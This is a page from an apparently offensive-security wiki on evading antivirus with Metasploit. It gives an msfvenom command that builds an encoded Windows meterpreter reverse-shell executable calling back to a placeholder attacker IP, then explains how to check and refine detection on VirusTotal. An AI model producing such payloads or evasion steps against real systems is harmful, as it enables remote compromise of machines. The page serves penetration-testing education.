Zero Day Archives
  • What is Zero Day Archives?
  • Contributors
  • Wireless Security
    • Intro to WiFi Pentesting
      • WEP Networks
      • WPS
      • WPA-PSK Networks
      • WPA & WPA2 PSK
      • WPA2 & WPA3 Enterprise Networks
      • WPA2 & WPA3-APLess
  • Reverse Engineering
    • Reverse Engineering
      • Introduction to Software Reverse Engineering
        • Introduction to Capture the Flag (CTF) Competitions
        • What are PE & Elf Binaries
        • Assembly Language for Beginner Reverse Engineers
        • Memory Registers for x86-64 (64-bit) and x86 (32-bit)
        • Reversing Tools: Command-Line Utilities for Binary Analysis
        • Reversing ELF Binaries: Techniques and Tools
      • Disassembly & Debugging
        • GDB for Reverse Engineering
        • RADARE2 for Reverse Engineering
        • GHIDRA for Reverse Engineering
        • IDA Pro for Reverse Engineering
      • Binary Exploitation
        • Buffer Overflows
          • What are Buffer Overflows and Stack Protections?
          • Commonly Exploited C Functions and Their Secure Alternatives
          • Basic Buffer Overflow in x86-64 Using GDB
        • Cryptography
          • Understanding Ciphers and Identifying Common Patterns
          • Teaching XOR Operations in Binary Exploitation
        • Return Oriented Programming (ROP)
          • Practical Guide to Exploring and Identifying Return-Oriented Programming (ROP)
        • Cracking and Patching Binaries
          • Tactics, Tools, and Procedures for Cracking and Patching Binaries
        • Ret2Win Challenges
  • Malware Analysis
    • Malware Analysis
      • Static Analysis
  • Transporting Files to/from Victims
    • Transferring Files to/from High Value Targets
      • Linux
      • Windows
      • CrackMapExec (NetExec)
  • Penetration Testing against GIT Remote Repositories
    • Targeting GIT Repositories
      • Attacking GIT
  • Network Pivoting, Port Forwarding, and Tunneling
    • Pivoting
      • Ligolo-ng
        • Basic Pivoting
        • Setup Reverse Shells through Pivot
        • Transferring Files through Pivot
      • Pivoting: Using Remote Desktop
      • ProxyChains
      • Metasploit
    • SSH Tunneling
      • SSH Local Port Forwarding
      • SSH Dynamic Port Forwarding
      • Sshuttle over SSH
    • Port Fowarding
      • Chisel Port Forwarding
      • NetSH for Port Forwarding
      • Plink for Port Forwarding
      • SoCat
      • Metasploit: Port Forwarding
  • Anti-Virus Evasion
    • Anti-Virus Evasion
      • Evasion with Metasploit
      • Evasion wtih Shellter
      • Evasion with Virus Total
  • Public Exploit Research
    • Online Exploit Research & Methods
  • Password Attacks
    • Password Attacks
      • Identifying Hashes
        • Hash Identifier Tools
      • John The Ripper
        • Cracking Passwords with John
        • Convert to Hashes with John
        • NTLM vs NTLMv2 Hashes + CrackMapExec
      • Hashcat
        • Cracking Passwords with Hashcat
      • Hydra
        • Hydra for Network Services
        • Hydra for Web Services
      • Mutating Wordlists for John & Hashcat
        • Mutating Wordlists
  • Digital Forensics & Incident Response (DFIR)
    • Digital Forensics
  • Data Science
    • Data Science/AI
  • Software Defined Radio (SDR)
    • Software Defined Radio
  • Embedded Systems Programming
    • Field Programmable Gate Arrays (FPGAs)
  • Other Resources
    • Resources for Hackers
Powered by GitBook
On this page
  1. Anti-Virus Evasion
  2. Anti-Virus Evasion

Evasion with Metasploit

Metasploit Anti-Virus Evasion

How Metasploit Evasion Works

Metasploit allows users to create payloads that are specifically designed to bypass AV detection. One way it achieves this is by encoding payloads using different encoding techniques that make the payload appear as benign to AV software.

Using Metasploit's Evasion Features

  1. Generate a Payload with Evasion

To generate a payload with evasion capabilities, you can use the msfvenom command in Metasploit. You can specify different encoders to encode the payload, which makes it harder for AV software to detect.

Example of generating an encoded payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -e x86/shikata_ga_nai -f exe > payload.exe

Here:

  • -p windows/meterpreter/reverse_tcp specifies the payload.

  • LHOST and LPORT define the attacker's IP and listening port.

  • -e x86/shikata_ga_nai specifies an encoder to evade detection.

  • -f exe creates an executable file.

The shikata_ga_nai encoder is a well-known encoder used for evading AV detection. Metasploit supports a variety of encoders, each with unique obfuscation techniques.

  1. Test the Payload with VirusTotal

Once the payload is generated, you may want to test its detection rate using VirusTotal. VirusTotal scans files with multiple antivirus engines, allowing you to see how likely it is that your payload will be flagged.

You can upload the file to VirusTotal and check the results:

https://www.virustotal.com/

If your payload is detected, you may need to change the encoding or use other techniques to further evade AV detection.

Metasploit Evasion Techniques:

  • Encoding Payloads: As shown above, encoding the payload with msfvenom can help avoid detection by AV software.

  • Custom Encoders: Metasploit allows you to create custom encoders or use third-party encoding techniques for added evasion.

  • Staging Payloads: Metasploit’s staged payloads can split the attack into two parts (the initial payload and the second-stage payload), which can bypass detection methods.

PreviousAnti-Virus EvasionNextEvasion wtih Shellter

Last updated 18 days ago